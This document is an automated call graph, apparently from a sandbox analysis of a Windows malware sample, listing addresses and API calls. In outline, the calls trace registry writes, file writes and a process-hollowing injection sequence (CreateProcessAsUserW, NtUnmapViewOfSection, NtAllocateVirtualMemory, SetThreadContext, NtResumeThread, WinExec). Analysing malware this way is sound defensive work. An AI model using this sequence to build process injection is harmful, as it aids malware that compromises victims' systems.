29733 27c881c 22 API calls 29732->29733 29734 27d8ca7 29733->29734 29736 27b480c 11 API calls 29734->29736 29737 27c881c 22 API calls 29735->29737 29738 27d8cc8 29736->29738 29740 27da203 29737->29740 29739 27b4798 11 API calls 29738->29739 29742 27d8cff 29739->29742 29741 27c881c 22 API calls 29740->29741 29743 27da236 29741->29743 29744 27c881c 22 API calls 29742->29744 29746 27c881c 22 API calls 29743->29746 29745 27d8d23 29744->29745 29747 27b480c 11 API calls 29745->29747 29748 27da269 29746->29748 29750 27d8d44 29747->29750 29749 27b480c 11 API calls 29748->29749 29752 27da28a 29749->29752 29751 27b4798 11 API calls 29750->29751 29754 27d8d7b 29751->29754 29753 27b4798 11 API calls 29752->29753 29755 27da2c1 29753->29755 29756 27c881c 22 API calls 29754->29756 29758 27c881c 22 API calls 29755->29758 29757 27d8d9f 29756->29757 30431 27c8798 LoadLibraryW 29757->30431 29759 27da2e5 29758->29759 29760 27b480c 11 API calls 29759->29760 29766 27da306 29760->29766 29763 27c8798 21 API calls 29764 27d8dd2 29763->29764 29765 27c8798 21 API calls 29764->29765 29767 27d8de6 29765->29767 29769 27b4798 11 API calls 29766->29769 29768 27c8798 21 API calls 29767->29768 29770 27d8dfa 29768->29770 29774 27da33d 29769->29774 29771 27c8798 21 API calls 29770->29771 29772 27d8e0e 29771->29772 29773 27c8798 21 API calls 29772->29773 29775 27d8e22 CloseHandle 29773->29775 29776 27c881c 22 API calls 29774->29776 29777 27b480c 11 API calls 29775->29777 29778 27da361 29776->29778 29780 27d8e4e 29777->29780 29779 27b480c 11 API calls 29778->29779 29781 27da382 29779->29781 29782 27b4798 11 API calls 29780->29782 29783 27b4798 11 API calls 29781->29783 29784 27d8e85 29782->29784 29786 27da3b9 29783->29786 29785 27c881c 22 API calls 29784->29785 29787 27d8ea9 29785->29787 29789 27c881c 22 API calls 29786->29789 29788 27b480c 11 API calls 29787->29788 29792 27d8eca 29788->29792 29790 27da3dd 29789->29790 29791 27b480c 11 API calls 29790->29791 29793 27da3fe 29791->29793 29794 27b4798 11 API calls 29792->29794 29795 27b4798 11 API calls 29793->29795 29796 27d8f01 29794->29796 29798 27da435 29795->29798 29797 27c881c 22 API calls 29796->29797 29797->29259 29799 27c881c 22 API calls 29798->29799 29800 27da459 29799->29800 29801 27b480c 11 API calls 29800->29801 29802 27da47a 29801->29802 29803 27b4798 11 API calls 29802->29803 29804 27da4b1 29803->29804 29805 27c881c 22 API calls 29804->29805 29806 27da4d5 29805->29806 29807 27c881c 22 API calls 29806->29807 29808 27da4e4 29807->29808 29809 27c881c 22 API calls 29808->29809 29810 27da4f3 29809->29810 29811 27c881c 22 API calls 29810->29811 29812 27da502 29811->29812 29813 27c881c 22 API calls 29812->29813 29814 27da511 29813->29814 29815 27c881c 22 API calls 29814->29815 29816 27da520 29815->29816 29817 27c881c 22 API calls 29816->29817 29818 27da52f 29817->29818 29819 27c881c 22 API calls 29818->29819 29820 27da53e 29819->29820 29821 27c881c 22 API calls 29820->29821 29822 27da54d 29821->29822 29823 27c881c 22 API calls 29822->29823 29824 27da55c 29823->29824 29825 27c881c 22 API calls 29824->29825 29826 27da56b 29825->29826 29827 27c881c 22 API calls 29826->29827 29828 27da57a 29827->29828 29829 27c881c 22 API calls 29828->29829 29830 27da589 29829->29830 29831 27c881c 22 API calls 29830->29831 29832 27da598 29831->29832 29833 27c881c 22 API calls 29832->29833 29834 27da5a7 29833->29834 29835 27c881c 22 API calls 29834->29835 29836 27da5b6 29835->29836 29837 27b480c 11 API calls 29836->29837 29838 27da5d7 29837->29838 29839 27b4798 11 API calls 29838->29839 29840 27da60e 29839->29840 29841 27c881c 22 API calls 29840->29841 29842 27da632 29841->29842 29843 27c881c 22 API calls 29842->29843 29844 27da665 29843->29844 29845 27c881c 22 API calls 29844->29845 29846 27da698 29845->29846 29847 27c881c 22 API calls 29846->29847 29848 27da6cb 29847->29848 29849 27c881c 22 API calls 29848->29849 29850 27da6fe 29849->29850 29851 27c881c 22 API calls 29850->29851 29852 27da731 29851->29852 29853 27c881c 22 API calls 29852->29853 29854 27da764 29853->29854 29855 27c881c 22 API calls 29854->29855 29856 27da797 29855->29856 29857 27b480c 11 API calls 29856->29857 29858 27da7b8 29857->29858 29859 27b4798 11 API calls 29858->29859 29860 27da7ef 29859->29860 29861 27c881c 22 API calls 29860->29861 29862 27da813 29861->29862 29863 27b480c 11 API calls 29862->29863 29864 27da834 29863->29864 29865 27b4798 11 API calls 29864->29865 29866 27da86b 29865->29866 29867 27c881c 22 API calls 29866->29867 29868 27da88f 29867->29868 29869 27b480c 11 API calls 29868->29869 29870 27da8b0 29869->29870 29871 27b4798 11 API calls 29870->29871 29872 27da8e7 29871->29872 29873 27c881c 22 API calls 29872->29873 29874 27da90b 29873->29874 29875 27c881c 22 API calls 29874->29875 29876 27da93e 29875->29876 29877 27c881c 22 API calls 29876->29877 29878 27da971 29877->29878 29879 27c881c 22 API calls 29878->29879 29880 27da9a4 29879->29880 29881 27c881c 22 API calls 29880->29881 29882 27da9d7 29881->29882 29883 27c881c 22 API calls 29882->29883 29884 27daa0a 29883->29884 29885 27c881c 22 API calls 29884->29885 29886 27daa3d 29885->29886 29887 27c881c 22 API calls 29886->29887 29888 27daa70 29887->29888 29889 27c881c 22 API calls 29888->29889 29890 27daaa3 29889->29890 29891 27c881c 22 API calls 29890->29891 29892 27daad6 29891->29892 29893 27c881c 22 API calls 29892->29893 29894 27dab09 29893->29894 29895 27c881c 22 API calls 29894->29895 29896 27dab3c 29895->29896 29897 27c881c 22 API calls 29896->29897 29898 27dab6f 29897->29898 29899 27c881c 22 API calls 29898->29899 29900 27daba2 29899->29900 29901 27c881c 22 API calls 29900->29901 29902 27dabd5 29901->29902 29903 27c881c 22 API calls 29902->29903 29904 27dac08 29903->29904 29905 27c881c 22 API calls 29904->29905 29906 27dac3b 29905->29906 29907 27c881c 22 API calls 29906->29907 29908 27dac6e 29907->29908 29909 27c881c 22 API calls 29908->29909 29910 27daca1 29909->29910 29911 27c881c 22 API calls 29910->29911 29912 27dacd4 29911->29912 30401 27c8184 29912->30401 29915 27b480c 11 API calls 29916 27dad04 29915->29916 29917 27b4798 11 API calls 29916->29917 29918 27dad3b 29917->29918 29919 27c881c 22 API calls 29918->29919 29920 27dad5f 29919->29920 29921 27b480c 11 API calls 29920->29921 29922 27dad80 29921->29922 29923 27b4798 11 API calls 29922->29923 29924 27dadb7 29923->29924 29925 27c881c 22 API calls 29924->29925 29926 27daddb 29925->29926 29927 27b480c 11 API calls 29926->29927 29928 27dadfc 29927->29928 29929 27b4798 11 API calls 29928->29929 29930 27dae33 29929->29930 29931 27c881c 22 API calls 29930->29931 29932 27dae57 ExitProcess 29931->29932 29934 27c8830 29933->29934 29935 27c884f LoadLibraryA 29934->29935 30438 27b494c 29935->30438 29938 27b494c 29939 27c8872 GetProcAddress 29938->29939 29940 27c8899 29939->29940 29941 27c7cf8 18 API calls 29940->29941 29942 27c88dd FreeLibrary 29941->29942 29943 27c88f5 29942->29943 29944 27b44d0 11 API calls 29943->29944 29945 27c8902 29944->29945 29945->29123 29952 27ce388 29946->29952 29947 27ce40b 29948 27b44ac 11 API calls 29947->29948 29949 27ce413 29948->29949 29951 27b4500 11 API calls 29949->29951 29950 27b49a4 11 API calls 29950->29952 29953 27ce41e 29951->29953 29952->29947 29952->29950 29954 27b44d0 11 API calls 29953->29954 29955 27ce438 29954->29955 29955->29150 29957 27ceb0b 29956->29957 29958 27ceb36 RegOpenKeyA 29957->29958 29959 27ceb44 29958->29959 29960 27b49a4 11 API calls 29959->29960 29961 27ceb5c 29960->29961 29962 27ceb69 RegSetValueExA RegCloseKey 29961->29962 29963 27ceb8d 29962->29963 29964 27b44d0 11 API calls 29963->29964 29965 27ceb9a 29964->29965 29966 27b44ac 11 API calls 29965->29966 29967 27ceba2 29966->29967 29967->29153 29973 27ce999 29968->29973 29969 27ce9c5 29970 27b44ac 11 API calls 29969->29970 29972 27ce9da 29970->29972 29972->29411 29973->29969 30440 27b4694 11 API calls 29973->30440 30441 27b4500 11 API calls 29973->30441 29976 27b494c 29975->29976 29977 27b7e1a GetFileAttributesA 29976->29977 29978 27b7e25 29977->29978 29978->29475 29978->29480 29980 27cdf16 29979->29980 30442 27b4ecc 29980->30442 29982 27cdf1e 29983 27cdf3e RtlDosPathNameToNtPathName_U 29982->29983 30448 27cde50 29983->30448 29985 27cdf5a NtCreateFile 29986 27cdf85 29985->29986 29987 27b49a4 11 API calls 29986->29987 29988 27cdf97 NtWriteFile NtClose 29987->29988 29989 27cdfc1 29988->29989 30449 27b4c0c 29989->30449 29992 27b44ac 11 API calls 29993 27cdfd1 29992->29993 29993->29475 29995 27b4958 29994->29995 29996 27b4993 29995->29996 29997 27b4570 11 API calls 29995->29997 30000 27c8ba8 29996->30000 29998 27b496f 29997->29998 29998->29996 29999 27b2c2c 11 API calls 29998->29999 29999->29996 30001 27c8bb0 30000->30001 30002 27b480c 11 API calls 30001->30002 30003 27c8bf3 30002->30003 30004 27b4798 11 API calls 30003->30004 30005 27c8c18 30004->30005 30006 27c881c 22 API calls 30005->30006 30007 27c8c33 30006->30007 30008 27b480c 11 API calls 30007->30008 30009 27c8c4c 30008->30009 30010 27b4798 11 API calls 30009->30010 30011 27c8c71 30010->30011 30012 27c881c 22 API calls 30011->30012 30013 27c8c8c 30012->30013 30014 27ca6ef 30013->30014 30015 27b480c 11 API calls 30013->30015 30016 27b44d0 11 API calls 30014->30016 30020 27c8cbd 30015->30020 30017 27ca70c 30016->30017 30018 27b44d0 11 API calls 30017->30018 30019 27ca71c 30018->30019 30021 27b4c0c SysFreeString 30019->30021 30023 27b4798 11 API calls 30020->30023 30022 27ca727 30021->30022 30024 27b44d0 11 API calls 30022->30024 30027 27c8ce2 30023->30027 30025 27ca737 30024->30025 30026 27b44ac 11 API calls 30025->30026 30028 27ca73f 30026->30028 30030 27c881c 22 API calls 30027->30030 30029 27b44d0 11 API calls 30028->30029 30031 27ca74c 30029->30031 30032 27c8cfd 30030->30032 30033 27b44d0 11 API calls 30031->30033 30034 27b480c 11 API calls 30032->30034 30035 27ca759 30033->30035 30036 27c8d16 30034->30036 30035->29321 30037 27b4798 11 API calls 30036->30037 30038 27c8d3b 30037->30038 30039 27c881c 22 API calls 30038->30039 30040 27c8d56 30039->30040 30040->30014 30041 27b480c 11 API calls 30040->30041 30042 27c8d9e 30041->30042 30043 27b4798 11 API calls 30042->30043 30044 27c8dc3 30043->30044 30045 27c881c 22 API calls 30044->30045 30046 27c8dde 30045->30046 30047 27b480c 11 API calls 30046->30047 30048 27c8df7 30047->30048 30049 27b4798 11 API calls 30048->30049 30050 27c8e1c 30049->30050 30051 27c881c 22 API calls 30050->30051 30052 27c8e37 30051->30052 30053 27b480c 11 API calls 30052->30053 30054 27c8e7c 30053->30054 30055 27b4798 11 API calls 30054->30055 30056 27c8ea1 30055->30056 30057 27c881c 22 API calls 30056->30057 30058 27c8ebc 30057->30058 30059 27b480c 11 API calls 30058->30059 30060 27c8ed5 30059->30060 30061 27b4798 11 API calls 30060->30061 30062 27c8efd 30061->30062 30063 27c881c 22 API calls 30062->30063 30064 27c8f1b 30063->30064 30065 27b480c 11 API calls 30064->30065 30066 27c8f37 30065->30066 30067 27b4798 11 API calls 30066->30067 30068 27c8f68 30067->30068 30069 27c881c 22 API calls 30068->30069 30070 27c8f8c 30069->30070 30071 27b480c 11 API calls 30070->30071 30072 27c8fa8 30071->30072 30073 27b4798 11 API calls 30072->30073 30074 27c8fd9 30073->30074 30075 27c881c 22 API calls 30074->30075 30076 27c8ffd 30075->30076 30077 27b480c 11 API calls 30076->30077 30078 27c9019 30077->30078 30079 27b4798 11 API calls 30078->30079 30080 27c904a 30079->30080 30081 27c881c 22 API calls 30080->30081 30082 27c906e 30081->30082 30452 27c85d4 30082->30452 30085 27c9120 30087 27b480c 11 API calls 30085->30087 30086 27b480c 11 API calls 30089 27c90cb 30086->30089 30088 27c913c 30087->30088 30090 27b4798 11 API calls 30088->30090 30091 27b4798 11 API calls 30089->30091 30092 27c916d 30090->30092 30093 27c90fc 30091->30093 30094 27c881c 22 API calls 30092->30094 30095 27c881c 22 API calls 30093->30095 30096 27c9191 30094->30096 30095->30085 30097 27c881c 22 API calls 30096->30097 30098 27c91c4 30097->30098 30099 27b480c 11 API calls 30098->30099 30100 27c91e0 30099->30100 30101 27b4798 11 API calls 30100->30101 30102 27c9211 30101->30102 30103 27c881c 22 API calls 30102->30103 30104 27c9235 30103->30104 30105 27b480c 11 API calls 30104->30105 30106 27c9251 30105->30106 30107 27b4798 11 API calls 30106->30107 30108 27c9282 30107->30108 30109 27c881c 22 API calls 30108->30109 30110 27c92a6 30109->30110 30111 27b2ee0 2 API calls 30110->30111 30112 27c92ab 30111->30112 30113 27b480c 11 API calls 30112->30113 30114 27c92ee 30113->30114 30115 27b4798 11 API calls 30114->30115 30116 27c931f 30115->30116 30117 27c881c 22 API calls 30116->30117 30118 27c9343 30117->30118 30119 27b480c 11 API calls 30118->30119 30120 27c935f 30119->30120 30121 27b4798 11 API calls 30120->30121 30122 27c9390 30121->30122 30123 27c881c 22 API calls 30122->30123 30124 27c93b4 30123->30124 30125 27b480c 11 API calls 30124->30125 30126 27c93d0 30125->30126 30127 27b4798 11 API calls 30126->30127 30128 27c9401 30127->30128 30129 27c881c 22 API calls 30128->30129 30130 27c9425 GetThreadContext 30129->30130 30130->30014 30131 27c9447 30130->30131 30132 27b480c 11 API calls 30131->30132 30133 27c9463 30132->30133 30134 27b4798 11 API calls 30133->30134 30135 27c9494 30134->30135 30136 27c881c 22 API calls 30135->30136 30137 27c94b8 30136->30137 30138 27b480c 11 API calls 30137->30138 30139 27c94d4 30138->30139 30140 27b4798 11 API calls 30139->30140 30141 27c9505 30140->30141 30142 27c881c 22 API calls 30141->30142 30143 27c9529 30142->30143 30144 27b480c 11 API calls 30143->30144 30145 27c9545 30144->30145 30146 27b4798 11 API calls 30145->30146 30147 27c9576 30146->30147 30148 27c881c 22 API calls 30147->30148 30149 27c959a 30148->30149 30150 27b480c 11 API calls 30149->30150 30151 27c95b6 30150->30151 30152 27b4798 11 API calls 30151->30152 30153 27c95e7 30152->30153 30154 27c881c 22 API calls 30153->30154 30155 27c960b 30154->30155 30156 27b480c 11 API calls 30155->30156 30157 27c9627 30156->30157 30158 27b4798 11 API calls 30157->30158 30159 27c9658 30158->30159 30160 27c881c 22 API calls 30159->30160 30161 27c967c 30160->30161 30464 27c824c 30161->30464 30164 27c99b7 30166 27b480c 11 API calls 30164->30166 30165 27c96b0 30167 27b480c 11 API calls 30165->30167 30168 27c99d3 30166->30168 30169 27c96cc 30167->30169 30170 27b4798 11 API calls 30168->30170 30171 27b4798 11 API calls 30169->30171 30173 27c9a04 30170->30173 30172 27c96fd 30171->30172 30175 27c881c 22 API calls 30172->30175 30174 27c881c 22 API calls 30173->30174 30241 27c99b0 30174->30241 30176 27c9721 30175->30176 30178 27b480c 11 API calls 30176->30178 30177 27b480c 11 API calls 30179 27c9a44 30177->30179 30180 27c973d 30178->30180 30181 27b4798 11 API calls 30179->30181 30182 27b4798 11 API calls 30180->30182 30183 27c9a75 30181->30183 30184 27c976e 30182->30184 30186 27c881c 22 API calls 30183->30186 30185 27c881c 22 API calls 30184->30185 30187 27c9792 30185->30187 30188 27c9a99 30186->30188 30190 27b480c 11 API calls 30187->30190 30189 27b480c 11 API calls 30188->30189 30191 27c9ab5 30189->30191 30192 27c97ae 30190->30192 30193 27b4798 11 API calls 30191->30193 30194 27b4798 11 API calls 30192->30194 30195 27c9ae6 30193->30195 30196 27c97df 30194->30196 30197 27c881c 22 API calls 30195->30197 30198 27c881c 22 API calls 30196->30198 30200 27c9b0a 30197->30200 30199 27c9803 30198->30199 30478 27c84bc 30199->30478 30202 27b480c 11 API calls 30200->30202 30208 27c9b26 30202->30208 30204 27c981b 30206 27c79ac 18 API calls 30204->30206 30205 27c9843 30207 27b480c 11 API calls 30205->30207 30209 27c983c 30206->30209 30212 27c985f 30207->30212 30210 27b4798 11 API calls 30208->30210 30211 27b480c 11 API calls 30209->30211 30214 27c9b57 30210->30214 30215 27c98d0 30211->30215 30213 27b4798 11 API calls 30212->30213 30218 27c9890 30213->30218 30216 27c881c 22 API calls 30214->30216 30217 27b4798 11 API calls 30215->30217 30219 27c9b7b 30216->30219 30223 27c9901 30217->30223 30221 27c881c 22 API calls 30218->30221 30220 27c79ac 18 API calls 30219->30220 30222 27c9b9c 30220->30222 30221->30209 30222->30014 30224 27b480c 11 API calls 30222->30224 30226 27c881c 22 API calls 30223->30226 30225 27c9bca 30224->30225 30229 27b4798 11 API calls 30225->30229 30227 27c9925 30226->30227 30228 27b480c 11 API calls 30227->30228 30230 27c9941 30228->30230 30232 27c9bfb 30229->30232 30231 27b4798 11 API calls 30230->30231 30235 27c9972 30231->30235 30233 27c881c 22 API calls 30232->30233 30234 27c9c1f 30233->30234 30236 27b480c 11 API calls 30234->30236 30237 27c881c 22 API calls 30235->30237 30240 27c9c3b 30236->30240 30238 27c9996 30237->30238 30492 27c79ac 30238->30492 30242 27b4798 11 API calls 30240->30242 30241->30177 30243 27c9c6c 30242->30243 30244 27c881c 22 API calls 30243->30244 30245 27c9c90 30244->30245 30506 27c8ab8 30245->30506 30247 27b480c 11 API calls 30249 27c9d17 30247->30249 30248 27c9c97 30248->30247 30250 27b4798 11 API calls 30249->30250 30251 27c9d48 30250->30251 30252 27c881c 22 API calls 30251->30252 30253 27c9d6c 30252->30253 30254 27b480c 11 API calls 30253->30254 30255 27c9d88 30254->30255 30256 27b4798 11 API calls 30255->30256 30257 27c9db9 30256->30257 30258 27c881c 22 API calls 30257->30258 30259 27c9ddd 30258->30259 30260 27b480c 11 API calls 30259->30260 30261 27c9df9 30260->30261 30262 27b4798 11 API calls 30261->30262 30263 27c9e2a 30262->30263 30264 27c881c 22 API calls 30263->30264 30265 27c9e4e 30264->30265 30266 27c7cf8 18 API calls 30265->30266 30267 27c9e6b 30266->30267 30268 27b480c 11 API calls 30267->30268 30269 27c9e87 30268->30269 30270 27b4798 11 API calls 30269->30270 30271 27c9eb8 30270->30271 30272 27c881c 22 API calls 30271->30272 30273 27c9edc 30272->30273 30274 27b480c 11 API calls 30273->30274 30275 27c9ef8 30274->30275 30276 27b4798 11 API calls 30275->30276 30277 27c9f29 30276->30277 30278 27c881c 22 API calls 30277->30278 30279 27c9f4d 30278->30279 30280 27b480c 11 API calls 30279->30280 30281 27c9f69 30280->30281 30282 27b4798 11 API calls 30281->30282 30283 27c9f9a 30282->30283 30284 27c881c 22 API calls 30283->30284 30285 27c9fbe 30284->30285 30286 27c7cf8 18 API calls 30285->30286 30287 27c9fde 30286->30287 30288 27b480c 11 API calls 30287->30288 30289 27c9ffa 30288->30289 30290 27b4798 11 API calls 30289->30290 30291 27ca02b 30290->30291 30292 27c881c 22 API calls 30291->30292 30293 27ca04f 30292->30293 30294 27b480c 11 API calls 30293->30294 30295 27ca06b 30294->30295 30296 27b4798 11 API calls 30295->30296 30297 27ca09c 30296->30297 30298 27c881c 22 API calls 30297->30298 30299 27ca0c0 30298->30299 30300 27b480c 11 API calls 30299->30300 30301 27ca0dc 30300->30301 30302 27b4798 11 API calls 30301->30302 30303 27ca10d 30302->30303 30304 27c881c 22 API calls 30303->30304 30305 27ca131 SetThreadContext NtResumeThread 30304->30305 30306 27b480c 11 API calls 30305->30306 30307 27ca17d 30306->30307 30308 27b4798 11 API calls 30307->30308 30309 27ca1ae 30308->30309 30310 27c881c 22 API calls 30309->30310 30311 27ca1d2 30310->30311 30312 27b480c 11 API calls 30311->30312 30313 27ca1ee 30312->30313 30314 27b4798 11 API calls 30313->30314 30315 27ca21f 30314->30315 30316 27c881c 22 API calls 30315->30316 30317 27ca243 30316->30317 30318 27b480c 11 API calls 30317->30318 30319 27ca25f 30318->30319 30320 27b4798 11 API calls 30319->30320 30321 27ca290 30320->30321 30322 27c881c 22 API calls 30321->30322 30323 27ca2b4 30322->30323 30324 27b480c 11 API calls 30323->30324 30325 27ca2d0 30324->30325 30326 27b4798 11 API calls 30325->30326 30327 27ca301 30326->30327 30328 27c881c 22 API calls 30327->30328 30329 27ca325 30328->30329 30330 27b2c2c 11 API calls 30329->30330 30331 27ca334 30330->30331 30332 27b480c 11 API calls 30331->30332 30333 27ca356 30332->30333 30334 27b4798 11 API calls 30333->30334 30335 27ca387 30334->30335 30336 27c881c 22 API calls 30335->30336 30337 27ca3ab 30336->30337 30338 27c8798 21 API calls 30337->30338 30339 27ca3bf 30338->30339 30340 27c8798 21 API calls 30339->30340 30341 27ca3d3 30340->30341 30342 27c8798 21 API calls 30341->30342 30343 27ca3e7 30342->30343 30344 27b480c 11 API calls 30343->30344 30345 27ca403 30344->30345 30346 27b4798 11 API calls 30345->30346 30347 27ca434 30346->30347 30348 27c881c 22 API calls 30347->30348 30349 27ca458 30348->30349 30350 27c8798 21 API calls 30349->30350 30351 27ca46c 30350->30351 30352 27c8798 21 API calls 30351->30352 30353 27ca480 30352->30353 30354 27b480c 11 API calls 30353->30354 30355 27ca49c 30354->30355 30356 27b4798 11 API calls 30355->30356 30357 27ca4ba 30356->30357 30358 27c8798 21 API calls 30357->30358 30359 27ca4d2 30358->30359 30360 27b480c 11 API calls 30359->30360 30361 27ca4ee 30360->30361 30362 27b4798 11 API calls 30361->30362 30363 27ca50c 30362->30363 30364 27c8798 21 API calls 30363->30364 30365 27ca524 30364->30365 30366 27c8798 21 API calls 30365->30366 30367 27ca538 30366->30367 30368 27c8798 21 API calls 30367->30368 30369 27ca54c 30368->30369 30370 27c8798 21 API calls 30369->30370 30371 27ca560 30370->30371 30372 27c8798 21 API calls 30371->30372 30373 27ca574 30372->30373 30374 27b480c 11 API calls 30373->30374 30375 27ca590 30374->30375 30376 27b4798 11 API calls 30375->30376 30377 27ca5ae 30376->30377 30378 27c8798 21 API calls 30377->30378 30379 27ca5c6 30378->30379 30380 27b480c 11 API calls 30379->30380 30381 27ca5e2 30380->30381 30382 27b4798 11 API calls 30381->30382 30383 27ca600 30382->30383 30384 27c8798 21 API calls 30383->30384 30385 27ca618 30384->30385 30386 27b480c 11 API calls 30385->30386 30387 27ca634 30386->30387 30388 27b4798 11 API calls 30387->30388 30389 27ca652 30388->30389 30390 27c8798 21 API calls 30389->30390 30391 27ca66a 30390->30391 30392 27b480c 11 API calls 30391->30392 30393 27ca686 30392->30393 30394 27b4798 11 API calls 30393->30394 30395 27ca6a4 30394->30395 30396 27c8798 21 API calls 30395->30396 30397 27ca6bc 30396->30397 30398 27c8798 21 API calls 30397->30398 30399 27ca6db 30398->30399 30400 27c8798 21 API calls 30399->30400 30400->30014 30402 27b4500 11 API calls 30401->30402 30403 27c81a7 30402->30403 30404 27b480c 11 API calls 30403->30404 30405 27c81c6 30404->30405 30406 27c8018 17 API calls 30405->30406 30407 27c81d9 30406->30407 30408 27c80c0 15 API calls 30407->30408 30409 27c81df FlushInstructionCache 30408->30409 30410 27c8205 30409->30410 30411 27b44ac 11 API calls 30410->30411 30412 27c820d 30411->30412 30412->29915 30414 27b4500 11 API calls 30413->30414 30415 27c842b 30414->30415 30416 27b480c 11 API calls 30415->30416 30417 27c844a 30416->30417 30418 27c8018 17 API calls 30417->30418 30419 27c845d 30418->30419 30420 27c80c0 15 API calls 30419->30420 30421 27c8463 WinExec 30420->30421 30422 27c8485 30421->30422 30423 27b44ac 11 API calls 30422->30423 30424 27c848d 30423->30424 30424->29250 30425->29310 30426->29469 30427->29523 30428->29640 30429->29474 30430->29564 30432 27c87bf GetProcAddress 30431->30432 30433 27c8807 30431->30433 30434 27c87fc FreeLibrary 30432->30434 30435 27c87d9 30432->30435 30433->29763 30434->30433 30436 27c7cf8 18 API calls 30435->30436 30437 27c87f1 30436->30437 30437->30434 30439 27b4950 GetModuleHandleA 30438->30439 30439->29938 30440->29973 30441->29973 30443 27b4ee8 30442->30443 30444 27b4ed2 SysAllocStringLen 30442->30444 30443->29982 30444->30443 30445 27b4bdc 30444->30445 30446 27b4bf8 30445->30446 30447 27b4be8 SysAllocStringLen 30445->30447 30446->29982 30447->30445 30447->30446 30448->29985 30450 27b4c12 SysFreeString 30449->30450 30451 27b4c20 30449->30451 30450->30451 30451->29992 30453 27b4500 11 API calls 30452->30453 30454 27c85f7 30453->30454 30455 27b480c 11 API calls 30454->30455 30456 27c8616 30455->30456 30457 27c8018 17 API calls 30456->30457 30458 27c8629 30457->30458 30459 27c80c0 15 API calls 30458->30459 30460 27c862f CreateProcessAsUserW 30459->30460 30461 27c8673 30460->30461 30462 27b44ac 11 API calls 30461->30462 30463 27c867b 30462->30463 30463->30085 30463->30086 30465 27b4500 11 API calls 30464->30465 30466 27c8271 30465->30466 30467 27c790c 12 API calls 30466->30467 30468 27c827e 30467->30468 30469 27b4798 11 API calls 30468->30469 30470 27c828b 30469->30470 30471 27c8018 17 API calls 30470->30471 30472 27c829e 30471->30472 30473 27c80c0 15 API calls 30472->30473 30474 27c82a4 NtReadVirtualMemory 30473->30474 30475 27c82d2 30474->30475 30476 27b44d0 11 API calls 30475->30476 30477 27c82df 30476->30477 30477->30164 30477->30165 30479 27b4500 11 API calls 30478->30479 30480 27c84e1 30479->30480 30481 27c790c 12 API calls 30480->30481 30482 27c84ee 30481->30482 30483 27b4798 11 API calls 30482->30483 30484 27c84fb 30483->30484 30485 27c8018 17 API calls 30484->30485 30486 27c850e 30485->30486 30487 27c80c0 15 API calls 30486->30487 30488 27c8514 NtUnmapViewOfSection 30487->30488 30489 27c8534 30488->30489 30490 27b44d0 11 API calls 30489->30490 30491 27c8541 30490->30491 30491->30204 30491->30205 30493 27b4500 11 API calls 30492->30493 30494 27c79d1 30493->30494 30495 27c790c 12 API calls 30494->30495 30496 27c79de 30495->30496 30497 27b4798 11 API calls 30496->30497 30498 27c79eb 30497->30498 30499 27c8018 17 API calls 30498->30499 30500 27c79fe 30499->30500 30501 27c80c0 15 API calls 30500->30501 30502 27c7a04 NtAllocateVirtualMemory 30501->30502 30503 27c7a35 30502->30503 30504 27b44d0 11 API calls 30503->30504 30505 27c7a42 30504->30505 30505->30241 30507 27b2c10 11 API calls 30506->30507 30508 27c8aee 30507->30508 30508->30248 30509 27b1c6c 30510 27b1c7c 30509->30510 30511 27b1d04 30509->30511 30514 27b1c89 30510->30514 30515 27b1cc0 30510->30515 30512 27b1f58 30511->30512 30513 27b1d0d 30511->30513 30517 27b1fec 30512->30517 30522 27b1f68 30512->30522 30523 27b1fac 30512->30523 30518 27b1d25 30513->30518 30519 27b1e24 30513->30519 30516 27b1c94 30514->30516 30557 27b1724 30514->30557 30520 27b1724 10 API calls 30515->30520 30524 27b1d2c 30518->30524 30531 27b1d48 30518->30531 30532 27b1dfc 30518->30532 30535 27b1e7c 30519->30535 30536 27b1e55 Sleep 30519->30536 30543 27b1e95 30519->30543 30533 27b1cd7 30520->30533 30525 27b1724 10 API calls 30522->30525 30527 27b1fb2 30523->30527 30528 27b1724 10 API calls 30523->30528 30542 27b1f82 30525->30542 30526 27b1724 10 API calls 30545 27b1f2c 30526->30545 30548 27b1fc1 30528->30548 30529 27b1cb9 30530 27b1ca1 30530->30529 30581 27b1a8c 30530->30581 30537 27b1d79 Sleep 30531->30537 30549 27b1d9c 30531->30549 30538 27b1724 10 API calls 30532->30538 30541 27b1a8c 8 API calls 30533->30541 30547 27b1cfd 30533->30547 30534 27b1fa7 30535->30526 30535->30543 30536->30535 30539 27b1e6f Sleep 30536->30539 30540 27b1d91 Sleep 30537->30540 30537->30549 30552 27b1e05 30538->30552 30539->30519 30540->30531 30541->30547 30542->30534 30550 27b1a8c 8 API calls 30542->30550 30545->30543 30551 27b1a8c 8 API calls 30545->30551 30546 27b1e1d 30548->30534 30555 27b1a8c 8 API calls 30548->30555 30550->30534 30553 27b1f50 30551->30553 30552->30546 30554 27b1a8c 8 API calls 30552->30554 30554->30546 30556 27b1fe4 30555->30556 30558 27b1968 30557->30558 30559 27b173c 30557->30559 30560 27b1938 30558->30560 30561 27b1a80 30558->30561 30568 27b17cb Sleep 30559->30568 30569 27b174e 30559->30569 30567 27b1947 Sleep 30560->30567 30574 27b1986 30560->30574 30562 27b1a89 30561->30562 30563 27b1684 VirtualAlloc 30561->30563 30562->30530 30565 27b16bf 30563->30565 30566 27b16af 30563->30566 30564 27b175d 30564->30530 30565->30530 30598 27b1644 30566->30598 30572 27b195d Sleep 30567->30572 30567->30574 30568->30569 30573 27b17e4 Sleep 30568->30573 30569->30564 30570 27b182c 30569->30570 30575 27b180a Sleep 30569->30575 30579 27b15cc VirtualAlloc 30570->30579 30580 27b1838 30570->30580 30572->30560 30573->30559 30576 27b19a4 30574->30576 30577 27b15cc VirtualAlloc 30574->30577 30575->30570 30578 27b1820 Sleep 30575->30578 30576->30530 30577->30576 30578->30569 30579->30580 30580->30530 30582 27b1b6c 30581->30582 30583 27b1aa1 30581->30583 30584 27b16e8 30582->30584 30585 27b1aa7 30582->30585 30583->30585 30588 27b1b13 Sleep 30583->30588 30587 27b1c66 30584->30587 30590 27b1644 2 API calls 30584->30590 30586 27b1ab0 30585->30586 30591 27b1b4b Sleep 30585->30591 30594 27b1b81 30585->30594 30586->30529 30587->30529 30588->30585 30589 27b1b2d Sleep 30588->30589 30589->30583 30592 27b16f5 VirtualFree 30590->30592 30593 27b1b61 Sleep 30591->30593 30591->30594 30595 27b170d 30592->30595 30593->30585 30596 27b1c00 VirtualFree 30594->30596 30597 27b1ba4 30594->30597 30595->30529 30596->30529 30597->30529 30599 27b1681 30598->30599 30600 27b164d 30598->30600 30599->30565 30600->30599 30601 27b164f Sleep 30600->30601 30602 27b1664 30601->30602 30602->30599 30603 27b1668 